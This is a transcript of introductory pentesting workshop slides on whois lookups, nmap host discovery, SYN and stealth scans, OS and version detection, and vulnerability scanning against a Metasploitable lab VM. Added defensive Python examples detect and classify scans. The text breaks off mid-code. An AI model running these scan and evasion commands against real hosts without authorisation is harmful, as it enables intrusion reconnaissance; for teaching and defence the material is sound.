Pentesting · 2018-07-19 · Pentesting –How is it usually done •Intelligence/ Information...

Pentesting – An Introduction

Transcript of Pentesting · 2018-07-19

Page 1:

Pentesting – An Introduction

Page 2:

Workshop Flow – 1

• Nature of Cyber Security Problem (Slides 4-7)

• Introduction – Pentesting - what, why, how (8-9)

• Pentesting - Intelligence Gathering (10-11)

• Pentesting tools demo – Kali Linux, NMAP (12)

• Intelligence Gathering using WhoIS (13-15)

• Metasploitable OS – An Introduction (16)

• Pentest Lab 1.1 - Setup Vmware/ Virtual Box, Kali Linux VM, Metasploitable VM, Familiarity with Kali Linux, WhoIs

• Intelligence Gathering using NMAP (18-36)
  • Host Discovery
  • Port Scanning
  • OS Detection
  • Services and Version Detection

• Pentest Lab 1.2 – Intelligence Gathering with NMAP

Page 3:

Workshop Flow - 2

• Vulnerability Analysis (38-39)

• Scanning with Nessus (40-42)

• Understanding Nessus Vulnerability Report (43)

• Understand vulnerabilities: where do they arise from? (44)

• Exploiting Vulnerabilities – Metasploit and Tools (45-54)
  • Rlogin
  • NFS share
  • Metasploit

• Approach to security – Threat Modelling (55)

• Pentest Lab 1.3
  • Scanning with Nessus, analysing the report
  • Exploit vulnerability 1, tools
  • Exploit vulnerability 2, tools
  • Exploit vulnerabilities 3 and 4 using Metasploit

Page 4:

Black Hat – White Hat (A Game)

• Securing Our Home – A perspective

Page 5:

Security is a Game of Survival

To survive, the deer must run faster than the tiger.

To survive, the tiger must run faster than the deer.

Page 6:

Physical Security vs Cyber Security

• How similar / different?
  • Intent

• Nature of the problem
  • Internet, global boundaries, glorified hackers, attack tools, standards, underworld economy, accountability, who is the adversary

• Strategy (attack and defense)
  • Weakest-link strategy, all-bases-covered strategy, insider attack, policies at different levels etc.

• Are they separate any more?

Spyware

Financial Malware

Page 7:

Security Problem Solving

• Security: a negative goal.
  • Achieve something despite whatever the adversary might do.

• Positive goal: “Ram can read grades.txt".
  • Ask Ram to check that it works. Easy to check.

• Negative goal: “Shyam cannot read grades.txt".
  • Check that Shyam cannot read grades.txt? Good to check, but not nearly enough. Must reason about all possible ways in which Shyam might get the data.
  • How might Shyam try to get the contents of grades.txt? Change permissions, steal the file, impersonate, etc.

• Open-ended problem: no absolute, definitive answer.

• Threat model concept and problem solving.

Page 8:

Pentesting – What, Why, How

• Pentesting : An Attack on a system in hopes of finding security weaknesses

• Rationale : Improving the security of your site by breaking into it

• How : Using Attacker’s Techniques

Page 9:

Pentesting – How is it usually done

• Intelligence/ Information Gathering

• Information Analysis and Planning – Component relationships, Target identification etc.

• Vulnerability Detection

• Penetration – Developing/ Customising, Choosing Exploit tools

• Attack/Privilege Escalation

• Analysis and reporting

• Clean-up

Page 10:

Intelligence Gathering

• What are we looking for?
  • Organizational intelligence, access point discovery, network discovery, infrastructure fingerprinting

• Open Source Intelligence
  • Corporate information: location, org chart, document metadata, network, email addresses, applications used, purchase agreements, defense technologies used (fingerprinting), financial information etc.
  • Individual information: all about the individual, social engineering

• Covert Intelligence: through individuals

• Footprinting (next slide)

• Identify protection systems (network, host, application, storage etc.)

Page 11:

Intelligence Gathering - Footprinting

• Passive Reconnaissance: Whois lookup, BGP looking glasses

• Active Footprinting: port scanning, banner grabbing, SNMP sweeps, DNS discovery, forward/reverse DNS, web application discovery, virtual host detection

• Establish Target List: versions, weak web applications, patch level

Page 12:

Kali Linux - Demo

A Collection of all Cyber Security related tools

Tools for Information Collection

Some info gathering tools

Some possible tools: Recon-ng/ Harvester, Maltego, NMAP, Burpsuite, Nessus/ Acunetix

Page 13:

Footprint - First Data

• IP address (some IP address in the network to start with) … hunting for IP addresses

• whois is normally a good place to start … Maltego? … email IDs, headers

Page 14:

Whois lookup

• Install it on your Linux distro by entering apt-get install whois in a terminal

• https://registry.in/whois/nita.ac.in

Domain Name: NITA.AC.IN
Registry Domain ID: D3544155-AFIN
Registrar WHOIS Server:
Registrar URL: http://www.ernet.in
Updated Date: 2017-03-02T07:21:44Z
Creation Date: 2009-04-06T05:03:46Z
Registry Expiry Date: 2019-04-06T05:03:46Z
Registrar Registration Expiration Date:
Registrar: ERNET India
Registrar IANA ID: 800068
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Reseller:
Domain Status: ok
Registrant Organization: National Institute of Technology, Agartala
Registrant State/Province:
Registrant Country: IN
Name Server: ns1.nkn.in
Name Server: ns2.nkn.in
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2018-06-25T15:58:44Z
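The whois record is a plain list of "Key: Value" lines, which makes it easy to process. The following is an added example, not from the slides, that parses such a record and runs the hygiene checks a domain owner would want from it: days to expiry against a reference date, whether a registrar transfer lock is set, whether DNSSEC is enabled, the name-server count and whether an abuse contact is published. The record is the one printed on the slide; the reference date (the workshop date) and the 180-day expiry threshold are assumptions of the example.

```python
from datetime import datetime

# The record as printed on the slide (registry.in lookup of nita.ac.in).
WHOIS_RECORD = """\
Domain Name: NITA.AC.IN
Registry Domain ID: D3544155-AFIN
Registrar WHOIS Server:
Registrar URL: http://www.ernet.in
Updated Date: 2017-03-02T07:21:44Z
Creation Date: 2009-04-06T05:03:46Z
Registry Expiry Date: 2019-04-06T05:03:46Z
Registrar Registration Expiration Date:
Registrar: ERNET India
Registrar IANA ID: 800068
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Reseller:
Domain Status: ok
Registrant Organization: National Institute of Technology, Agartala
Registrant State/Province:
Registrant Country: IN
Name Server: ns1.nkn.in
Name Server: ns2.nkn.in
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2018-06-25T15:58:44Z
"""


def parse_whois(text):
    """Parse 'Key: Value' lines into {key: [values]}; keys such as Name Server repeat.

    Splits on the first colon only, so URLs and timestamps in the value survive.
    Keys whose value is empty are left out, so record.get(key) tells you if the
    registry published that field at all.
    """
    record = {}
    for line in text.splitlines():
        line = line.strip().lstrip("> ")          # drop the ">>>" marker line prefix
        key, sep, value = line.partition(":")
        if not sep:
            continue
        key, value = key.strip(), value.strip()
        if value:
            record.setdefault(key, []).append(value)
    return record


def review_domain(record, today, expiry_warning_days=180):
    """Owner-side hygiene checks on a parsed record.

    today is a 'YYYY-MM-DD' reference date (assumed by this example). Returns
    the number of days until expiry and a list of (severity, message) findings.
    """
    reference = datetime.strptime(today, "%Y-%m-%d")
    findings = []
    days_to_expiry = None
    expiry_values = record.get("Registry Expiry Date")
    if expiry_values:
        expiry = datetime.strptime(expiry_values[0], "%Y-%m-%dT%H:%M:%SZ")
        days_to_expiry = (expiry - reference).days
        if days_to_expiry < 0:
            findings.append(("high", "domain expired %d days ago" % -days_to_expiry))
        elif days_to_expiry <= expiry_warning_days:
            findings.append(("medium", "domain expires in %d days" % days_to_expiry))
    else:
        findings.append(("low", "no expiry date in record"))
    # EPP status "ok" means no locks; a transfer lock is the *TransferProhibited status.
    statuses = {s.split()[0].lower() for s in record.get("Domain Status", [])}
    if not statuses & {"clienttransferprohibited", "servertransferprohibited"}:
        status_text = ", ".join(sorted(statuses)) or "none"
        findings.append(("medium", "no transfer lock set (status: %s)" % status_text))
    if record.get("DNSSEC", ["unsigned"])[0].lower() == "unsigned":
        findings.append(("low", "DNSSEC not enabled"))
    if len(set(record.get("Name Server", []))) < 2:
        findings.append(("medium", "fewer than two name servers listed"))
    if not record.get("Registrar Abuse Contact Email"):
        findings.append(("low", "registrar abuse contact email not published"))
    return {"days_to_expiry": days_to_expiry, "findings": findings}


if __name__ == "__main__":
    report = review_domain(parse_whois(WHOIS_RECORD), "2018-07-19")
    print("days to expiry:", report["days_to_expiry"])
    for severity, message in report["findings"]:
        print("[%s] %s" % (severity, message))
```

Run with a reference date after the expiry date and the same function reports the domain as expired, which is the case that matters most for a registrant: an expired domain can be re-registered by anyone, with the name servers and mail that go with it.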

Page 15:

Whois lookup

• root@kali:~# ping ns1.nkn.in

PING ns1.nkn.in (180.149.63.3) 56(84) bytes of data.

64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=1 ttl=56 time=40.3 ms

64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=2 ttl=56 time=45.0 ms

64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=3 ttl=56 time=46.1 ms

64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=4 ttl=56 time=45.3 ms

64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=5 ttl=56 time=44.5 ms

--- ns1.nkn.in ping statistics ---

5 packets transmitted, 5 received, 0% packet loss, time 7715ms

rtt min/avg/max/mdev = 40.333/44.292/46.140/2.048 ms

Page 16:

Metasploitable - Introduction

• An intentionally vulnerable Ubuntu Linux virtual machine that is designed for testing common vulnerabilities.

• Used for Labs to exploit

• This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms.

• Created by the Rapid7 Metasploit team

• Metasploitable login is “msfadmin”; the password is also “msfadmin”

Page 17:

Lab 1.1

• Lab Setup
  • Virtual Box/ Vmware

• Kali Linux, Metasploitable

• Kali Linux Tools

• Metasploitable

• Testing communication between Kali Linux, Metasploitable server

• Whois

Page 18:

NMAP

• nmap is an open-source port/security scanner

• Its primary function is the discovery and mapping of hosts on a network

• nmap is consistently voted as one of the most used security tools

• Needs as input a range or some specific address

Page 19:

NMAP

• Host Discovery – Identifying computers on a network

• Port Scanning – Enumerating the open ports on one or more target computers

• Version Detection – Interrogating network services listening on remote computers to determine the application name and version number

• OS Detection – Remotely determining the operating system from network devices

Page 20:

NMAP Demo (Script)

Run nmap command on Kali Linux Terminal.

Sample Syntax:

nmap [ <Scan Type> ...] [ <Options> ] { <target specification> }

TARGET SPECIFICATION:

Can pass hostnames, IP addresses, networks, etc.

Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254

-iL <inputfilename>: Input from list of hosts/networks

-iR <num hosts>: Choose random targets

--exclude <host1[,host2][,host3],...>: Exclude hosts/networks

--excludefile <exclude_file>: Exclude list from file

nmap -v -A <ip address> … look at the report nmap_report_1.txt in the Kali Linux reports folder

Page 21:

NMAP Host Discovery

• Querying multiple hosts using this method is referred to as a ping sweep … sweep through a range of IP addresses

• The most basic step in mapping out a network.

• Several sweep techniques
  • ARP sweep (default)
  • ICMP sweeps
  • Broadcast ICMP
  • Non-echo ICMP
  • TCP sweep
  • UDP sweep

Page 22:

Host Discovery : ARP Sweep “nmap 10.0.2.0/24 -sn”

Page 23:

Host Discovery : ICMP Sweeps

• Used by nmap when a router is in between (WAN)

• Technique
  • Send an ICMP ECHO request (ICMP type 8)
  • If an ICMP ECHO reply (ICMP type 0) is received: target is alive
  • No response: target is down

• Pros & Cons
  • Easy to implement
  • Fairly slow, easy to block

[Figure: scanner sends ICMP ECHO request to target; ICMP ECHO reply → a host is alive; no response → a host is down/filtered]

Page 24:

Host Discovery : TCP Sweeps

• Sending TCP ACK or TCP SYN packets

• The port number can be selected to avoid blocking by a firewall
  • Usually a good pick would be 21 / 22 / 23 / 25 / 80

• But.. firewalls can spoof a RESET packet for an IP address, so TCP Sweeps may not be reliable.

Page 25:

Host Discovery : UDP Sweeps

• Relies on the ICMP PORT UNREACHABLE message

• Assume the port is open if no ICMP PORT UNREACHABLE message is received after sending a UDP datagram

• Cons:
  • Routers can drop UDP packets as they cross the Internet
  • Many UDP services do not respond when correctly probed
  • Firewalls are usually configured to drop UDP packets (except for DNS)

• UDP sweep relies on the fact that a non-active UDP port will respond with an ICMP PORT UNREACHABLE message
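Seen from the network being mapped, the ICMP, TCP and UDP sweeps on pages 23 to 25 share one signature: a single source sends the same probe to many distinct hosts within a short time, while an ordinary client talks to one or two hosts. The following is an added example, not from the slides, that detects that pattern over firewall-style log lines. The log format (an iptables-like "KEY=VALUE" line with a timestamp), the sample lines and the thresholds (five hosts inside 60 seconds) are all constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log lines (not real captures): one ICMP echo sweep, one TCP SYN
# sweep to port 80, and a slow, low-volume source that should not alert.
SAMPLE_LOG = """\
2018-06-26T05:36:00 SRC=10.0.2.15 DST=10.0.2.1 PROTO=ICMP TYPE=8
2018-06-26T05:36:00 SRC=10.0.2.15 DST=10.0.2.2 PROTO=ICMP TYPE=8
2018-06-26T05:36:00 SRC=10.0.2.15 DST=10.0.2.3 PROTO=ICMP TYPE=8
2018-06-26T05:36:01 SRC=10.0.2.15 DST=10.0.2.4 PROTO=ICMP TYPE=8
2018-06-26T05:36:01 SRC=10.0.2.15 DST=10.0.2.5 PROTO=ICMP TYPE=8
2018-06-26T05:36:01 SRC=10.0.2.15 DST=10.0.2.6 PROTO=ICMP TYPE=8
2018-06-26T05:40:10 SRC=10.0.2.7 DST=10.0.2.1 PROTO=TCP DPT=80 FLAGS=SYN
2018-06-26T05:40:10 SRC=10.0.2.7 DST=10.0.2.2 PROTO=TCP DPT=80 FLAGS=SYN
2018-06-26T05:40:11 SRC=10.0.2.7 DST=10.0.2.3 PROTO=TCP DPT=80 FLAGS=SYN
2018-06-26T05:40:11 SRC=10.0.2.7 DST=10.0.2.4 PROTO=TCP DPT=80 FLAGS=SYN
2018-06-26T05:40:12 SRC=10.0.2.7 DST=10.0.2.5 PROTO=TCP DPT=80 FLAGS=SYN
2018-06-26T05:40:12 SRC=10.0.2.7 DST=10.0.2.6 PROTO=TCP DPT=80 FLAGS=SYN
2018-06-26T06:00:00 SRC=10.0.2.9 DST=10.0.2.4 PROTO=TCP DPT=22 FLAGS=SYN
2018-06-26T06:30:00 SRC=10.0.2.9 DST=10.0.2.5 PROTO=TCP DPT=22 FLAGS=SYN
2018-06-26T07:00:00 SRC=10.0.2.9 DST=10.0.2.6 PROTO=TCP DPT=22 FLAGS=SYN
2018-06-26T07:10:00 SRC=10.0.2.9 DST=10.0.2.1 PROTO=UDP DPT=53
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<kv>.*)$")


def parse_line(line):
    """Turn one log line into {'ts': datetime, 'SRC': ..., 'DST': ..., ...}, or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = {"ts": datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%S")}
    for pair in m.group("kv").split():
        key, _, value = pair.partition("=")
        rec[key] = value
    return rec


def probe_key(rec):
    """Describe the probe so that identical probes to different hosts group together."""
    proto = rec.get("PROTO")
    if proto == "ICMP":
        return "ICMP type %s" % rec.get("TYPE", "?")
    if proto == "TCP":
        return "TCP %s to port %s" % (rec.get("FLAGS", "?"), rec.get("DPT", "?"))
    if proto == "UDP":
        return "UDP to port %s" % rec.get("DPT", "?")
    return proto or "unknown"


def detect_sweeps(log_text, window=timedelta(seconds=60), min_hosts=5):
    """Alert when one source sends the same probe to >= min_hosts distinct hosts within window.

    Events are grouped by (source, probe) and sorted by time; for each event the
    distinct destinations reached within the following window are counted. One
    alert per (source, probe) is emitted, at the first window that crosses the
    threshold, so a long sweep does not flood the analyst.
    """
    groups = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and "SRC" in rec and "DST" in rec:
            groups[(rec["SRC"], probe_key(rec))].append((rec["ts"], rec["DST"]))
    alerts = []
    for (src, probe), events in groups.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            hosts = {dst for ts, dst in events[i:] if ts - start <= window}
            if len(hosts) >= min_hosts:
                alerts.append({"src": src, "probe": probe, "hosts": len(hosts),
                               "start": start.isoformat()})
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_sweeps(SAMPLE_LOG):
        print("sweep: %(src)s sent %(probe)s to %(hosts)d hosts from %(start)s" % alert)
```

The source 10.0.2.9 is the interesting negative case: it touches three hosts on port 22 and one on UDP/53 over more than an hour, which is what the "slow scan rate" technique on page 29 looks like; catching it needs a much longer window and a lower threshold, at the price of more false positives from ordinary administration traffic.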

Page 26:

NMAP Host Discovery summary

• -sL: List Scan - simply list targets to scan
• -sn: Ping Scan - go no further than determining if host is online
• -PN: Treat all hosts as online -- skip host discovery
• -PS/PA/PU [portlist]: TCP SYN/ACK or UDP discovery to given ports
• -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
• -PO [protocol list]: IP Protocol Ping
• -n/-R: Never do DNS resolution/Always resolve [default: sometimes]
• --dns-servers <serv1[,serv2],...>: Specify custom DNS servers
• --system-dns: Use OS's DNS resolver
• -sU: UDP Scan

Demo and look at the Wireshark capture

root@kali:~# nmap -sn 10.0.2.4

Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-26 05:36 EDT

Nmap scan report for 10.0.2.4

Host is up (0.00026s latency).

MAC Address: 08:00:27:1A:23:D5 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds

Page 27:

Port Scanning : TCP Connect Scan

• Uses the basic TCP connection establishment mechanism; completes the 3-way handshake

• Easy to detect by inspecting the system log

• Normally not used since expensive

[Figure: scanner sends SYN, target replies SYN/ACK, scanner sends ACK → a port is open. Scanner sends SYN, target replies RST/ACK → a port is closed]

Page 28:

Port Scanning : TCP SYN scan

• Does not establish a complete connection (half-open scanning)

• Send a SYN packet and wait for a response
  • If a SYN/ACK is received => the port is LISTENING
  • Immediately tear down the connection by sending a RESET
  • If an RST/ACK is received => a non-LISTENING port

• nmap -Pn <ip address> is a SYN scan for all ports

[Figure: scanner sends SYN, target replies SYN/ACK, scanner sends RST → a port is open. Scanner sends SYN, target replies RST/ACK → a port is closed]

Page 29:

Port Scanning : Stealth Scan

• To gather information about target sites while avoiding detection
  • Try to hide among normal network traffic
  • Not to be logged by the logging mechanism (stealth)

• Techniques
  • Flag probe packets (also called “inverse mapping”)
    • A response is sent back only by a closed port
    • By determining what services do not exist, an intruder can infer what services do exist
  • Slow scan rate
    • Difficult to detect => needs a long history log

CERT reported this technique in CERT® Incident Note IN-98.04

http://www.cert.org/incident_notes/IN-98.04.html

Page 30:

Port Scanning : Stealth Mapping

• RFC793: how to handle wrong-state packets
  • Closed ports: reply with a RESET packet to wrong-state packets
  • Open ports: ignore any packet in question

• Technique
  • A RST scan
  • A FIN probe with the FIN TCP flag set (eg nmap -sF -p25 <ip address> and capture)
  • An XMAS probe with the FIN, URG, ACK, SYN, RST, PUSH flags set (eg nmap -sX -p27 <ip address> and capture)
  • A NULL probe with no TCP flags set

[Figure: scanner sends probe packet, no response → a port is open. Scanner sends probe packet, target replies RST/ACK → a port is closed]
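Pages 27 to 30 describe each scan technique by the packet exchange it produces, and that exchange is also what lets a defender tell them apart in a capture: connect and SYN scans both open with SYN but differ in what the scanner sends after the target's SYN/ACK (an ACK completes the handshake, an RST tears it down), while FIN, NULL and Xmas probes are recognisable from their first packet, and for them the ports that stay silent are the inferred open|filtered set. The following is an added example, not from the slides, that classifies constructed packet records per (scanner, target) pair. The record layout (sender, receiver, service port on the target, tcpdump-style flag letters) and the three-port threshold are assumptions of the example; the Xmas probe is taken as FIN+PSH+URG.

```python
from collections import defaultdict

# Constructed packet records (not real captures), in time order. Each tuple is
# (sender, receiver, service port on the target, TCP flags); for the target's
# replies the port is its own source port, so one port = one probed service.
# Flags use tcpdump letters: S=SYN, A=ACK, R=RST, F=FIN, P=PSH, U=URG, "" = none.
PACKETS = [
    # 10.0.2.15: half-open SYN scan of five ports; 21/22/23 answer SYN/ACK
    ("10.0.2.15", "10.0.2.4", 21, "S"), ("10.0.2.4", "10.0.2.15", 21, "SA"), ("10.0.2.15", "10.0.2.4", 21, "R"),
    ("10.0.2.15", "10.0.2.4", 22, "S"), ("10.0.2.4", "10.0.2.15", 22, "SA"), ("10.0.2.15", "10.0.2.4", 22, "R"),
    ("10.0.2.15", "10.0.2.4", 23, "S"), ("10.0.2.4", "10.0.2.15", 23, "SA"), ("10.0.2.15", "10.0.2.4", 23, "R"),
    ("10.0.2.15", "10.0.2.4", 25, "S"), ("10.0.2.4", "10.0.2.15", 25, "RA"),
    ("10.0.2.15", "10.0.2.4", 80, "S"), ("10.0.2.4", "10.0.2.15", 80, "RA"),
    # 10.0.2.16: connect() scan, completes the handshake on open ports
    ("10.0.2.16", "10.0.2.4", 21, "S"), ("10.0.2.4", "10.0.2.16", 21, "SA"), ("10.0.2.16", "10.0.2.4", 21, "A"),
    ("10.0.2.16", "10.0.2.4", 22, "S"), ("10.0.2.4", "10.0.2.16", 22, "SA"), ("10.0.2.16", "10.0.2.4", 22, "A"),
    ("10.0.2.16", "10.0.2.4", 80, "S"), ("10.0.2.4", "10.0.2.16", 80, "RA"),
    # 10.0.2.17: FIN probes; only the closed ports (25, 80) answer with RST/ACK
    ("10.0.2.17", "10.0.2.4", 21, "F"),
    ("10.0.2.17", "10.0.2.4", 22, "F"),
    ("10.0.2.17", "10.0.2.4", 25, "F"), ("10.0.2.4", "10.0.2.17", 25, "RA"),
    ("10.0.2.17", "10.0.2.4", 80, "F"), ("10.0.2.4", "10.0.2.17", 80, "RA"),
    # 10.0.2.20: an ordinary SSH client, one port only, must not be reported
    ("10.0.2.20", "10.0.2.4", 22, "S"), ("10.0.2.4", "10.0.2.20", 22, "SA"), ("10.0.2.20", "10.0.2.4", 22, "A"),
]

# First-packet flag sets that identify the probe style of a scanner.
PROBE_TYPES = {"S": "SYN", "": "NULL", "F": "FIN", "FPU": "Xmas"}


def classify_scans(packets, min_ports=3):
    """Name the scan technique each (scanner, target) pair used.

    Only pairs that touched at least min_ports distinct ports are reported.
    Returns {(src, dst): {technique, ports, open, closed, unanswered}} where
    open/closed come from the target's SYN/ACK or RST/ACK replies and
    unanswered lists ports that never replied (open|filtered for inverse mapping).
    """
    probes = defaultdict(lambda: defaultdict(list))  # (src, dst) -> port -> scanner flags
    replies = defaultdict(dict)                      # (src, dst) -> port -> target reply flags
    for sender, receiver, port, flags in packets:
        reverse = (receiver, sender)
        if reverse in probes and port in probes[reverse]:
            replies[reverse][port] = flags           # target answering an earlier probe
        else:
            probes[(sender, receiver)][port].append(flags)

    results = {}
    for pair, ports in probes.items():
        if len(ports) < min_ports:
            continue
        styles = {PROBE_TYPES.get(seq[0], "other") for seq in ports.values()}
        if styles == {"SYN"}:
            follow_ups = {seq[1] for seq in ports.values() if len(seq) > 1}
            if "A" in follow_ups:
                technique = "TCP connect scan (handshake completed)"
            elif "R" in follow_ups:
                technique = "TCP SYN scan (half-open, RST after SYN/ACK)"
            else:
                technique = "TCP SYN probes (no open port answered)"
        else:
            technique = "/".join(sorted(styles - {"SYN"})) + " scan (inverse mapping)"
        answered = replies[pair]
        results[pair] = {
            "technique": technique,
            "ports": sorted(ports),
            "open": sorted(p for p, f in answered.items() if f == "SA"),
            "closed": sorted(p for p, f in answered.items() if f == "RA"),
            "unanswered": sorted(p for p in ports if p not in answered),
        }
    return results


if __name__ == "__main__":
    for (src, dst), r in classify_scans(PACKETS).items():
        print("%s -> %s: %s; probed %d ports, open %s, closed %s, silent %s"
              % (src, dst, r["technique"], len(r["ports"]), r["open"], r["closed"], r["unanswered"]))
```

The connect scan is the one a host's own logs can see, because the service accepts a connection; the half-open and inverse-mapping variants never reach the application, so detecting them needs packet-level data like the records above, from a firewall, IDS or a capture such as the Wireshark traces used in the demos.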

Page 31:

Port Scanning with nmap

• SCAN TECHNIQUES:
  • -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
  • -sN/sF/sX: TCP Null, FIN, and Xmas scans
  • -b <FTP relay host>: FTP bounce scan

• PORT SPECIFICATION AND SCAN ORDER:
  • -p <port ranges>: Only scan specified ports
    • Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080
  • -F: Fast mode - Scan fewer ports than the default scan
  • -r: Scan ports consecutively - don't randomize
  • --top-ports <number>: Scan <number> most common ports
  • --port-ratio <ratio>: Scan ports more common than <ratio>

Demo : Look at the Wireshark capture of nmap -sP x.x.x.x (uses syn scan; colorized conversations)

nmap -Pn 10.0.2.4

Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-26 05:14 EDT

Nmap scan report for 10.0.2.4

Host is up (0.00037s latency).

Not shown: 977 closed ports

PORT STATE SERVICE

21/tcp open ftp

22/tcp open ssh

23/tcp open telnet

Page 32:

Services and Versions Detection

• The nmap-service-probes database contains probes for querying various services and match expressions to recognize and parse responses

Page 33:

Operating System Detection

• Banner, DNS HINFO and …

• TCP/IP fingerprinting (IP stack implementations respond differently)
  • FIN probe, bogus flag probe

• TCP initial sequence number sampling, TCP initial window, ACK value

• ICMP error quenching, message quoting, ICMP echo integrity

• IP: DF, TOS, Fragmentation

Page 34:

OS Detection : Examples

• ACK: sending FIN|PSH|URG to a closed port
  • Most OS: ACK with the same sequence number
  • Windows: ACK with sequence number + 1

• Type of Service: probing with an ICMP_PORT_UNREACHABLE message
  • Most OS: TOS = 0
  • Linux: TOS = 0xC0

Page 35:

Version and OS Detection with nmap

• SERVICE/VERSION DETECTION:
  • -sV: Probe open ports to determine service/version info
  • --version-intensity <level>: Set from 0 (light) to 9 (try all probes)
  • --version-light: Limit to most likely probes (intensity 2)
  • --version-all: Try every single probe (intensity 9)
  • --version-trace: Show detailed version scan activity (for debugging)

• OS DETECTION:
  • -O: Enable OS detection
  • --osscan-limit: Limit OS detection to promising targets
  • --osscan-guess: Guess OS more aggressively

Demo -sV and wireshark capture

root@kali:~# nmap -sV 10.0.2.4

Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-26 06:01 EDT

Nmap scan report for 10.0.2.4

Host is up (0.00010s latency).

Not shown: 977 closed ports

PORT STATE SERVICE VERSION

21/tcp open ftp vsftpd 2.3.4

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)

Page 36:

Lab 1.2

• Workshop Lab Document

Page 37:

Vulnerabilities

• According to Wikipedia:

“The word vulnerability, in computer security, refers to a weakness in a system allowing an attacker to violate the confidentiality, integrity, availability, access control, consistency or audit mechanisms of the system or the data and applications it hosts”

• To software developers, a bug is synonymous with a vulnerability.
  • Ex: errors in a program’s source code or flawed program design
    • Buffer overflows
    • Memory leaks
    • Deadlocks
    • Arithmetic overflow
    • Accessing protected memory (access violation)

• The software bugs we are speaking of are used as the foundation to form an exploit. A security attack on a vulnerability is an exploit.

Page 38:

Vulnerabilities

Using Nmap or any other scanner, did we find any hosts worth looking at? The next step should be scanning for exploitable vulnerabilities.

What could be the approach?

• What data do we have till now?

Hosts, Open Ports, Operating System, Applications Running, Versions

• How could we use this data? Use this data to find vulnerabilities using various resources on the net (exploit DB, CVE database, other databases)

Or

• Use a Vulnerability Scanner
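The nmap -sV output on page 35 and the question on this page (how to turn hosts, open ports, services and versions into vulnerability candidates using a CVE or exploit database) are served by one added example below; it is not from the slides. It parses nmap's normal-output port table into product/version records and matches them against a local advisory table, reporting a confirmed match only when the version is known and listed, and an unverified one when nmap reported a product without a version. The advisory table is constructed for illustration: the UnrealIRCd entry uses CVE-2010-2075 from page 52, the other identifiers are placeholders, and the 6667/tcp line is added to the slide's listing (which stops at 22/tcp) to show the version-less case.

```python
import re

# nmap -sV output as printed on the slide, plus one constructed line for 6667/tcp
# (the slide's listing stops at 22/tcp; the irc line is added here for illustration).
NMAP_OUTPUT = """\
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-26 06:01 EDT
Nmap scan report for 10.0.2.4
Host is up (0.00010s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.3.4
22/tcp   open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
6667/tcp open  irc     UnrealIRCd
"""

# Constructed advisory table. Only CVE-2010-2075 is a real identifier (from the
# Nessus finding on page 52); the EXAMPLE-* ids are placeholders, not real advisories.
ADVISORIES = [
    {"product": "vsftpd", "versions": ["2.3.4"], "id": "EXAMPLE-ADVISORY-1 (placeholder)"},
    {"product": "OpenSSH", "versions": ["3.9p1"], "id": "EXAMPLE-ADVISORY-2 (placeholder)"},
    {"product": "UnrealIRCd", "versions": ["3.2.8.1"], "id": "CVE-2010-2075",
     "note": "UnrealIRCD 3.2.8.1 Backdoor Command Execution"},
]

PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)(?:\s+(?P<version>.*))?$")
VERSION_TOKEN = re.compile(r"^\d[\w.]*$")   # first token that starts with a digit, e.g. 2.3.4, 4.7p1


def parse_nmap_sv(text):
    """Extract port, state, service, product and version from nmap normal output.

    The VERSION column is free text ("OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)");
    the product is everything before the first version-looking token. When nmap
    names a product but no version, version is None and the caller must not
    treat the finding as confirmed.
    """
    findings = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue
        tokens = (m.group("version") or "").split()
        product, version = None, None
        for i, tok in enumerate(tokens):
            if VERSION_TOKEN.match(tok):
                product, version = " ".join(tokens[:i]), tok
                break
        if product is None and tokens:
            product = " ".join(tokens)
        findings.append({"port": int(m.group("port")), "proto": m.group("proto"),
                         "state": m.group("state"), "service": m.group("service"),
                         "product": product, "version": version})
    return findings


def match_advisories(findings, advisories):
    """Return one hit per (open port, advisory) where product matches and version is listed or unknown."""
    hits = []
    for f in findings:
        if f["state"] != "open" or not f["product"]:
            continue
        for adv in advisories:
            if adv["product"].lower() != f["product"].lower():
                continue
            if f["version"] is None:
                confidence = "unverified (no version detected; confirm from banner or on the host)"
            elif f["version"] in adv["versions"]:
                confidence = "version matches"
            else:
                continue
            hits.append({"port": f["port"], "product": f["product"], "version": f["version"],
                         "id": adv["id"], "confidence": confidence})
    return hits


if __name__ == "__main__":
    for hit in match_advisories(parse_nmap_sv(NMAP_OUTPUT), ADVISORIES):
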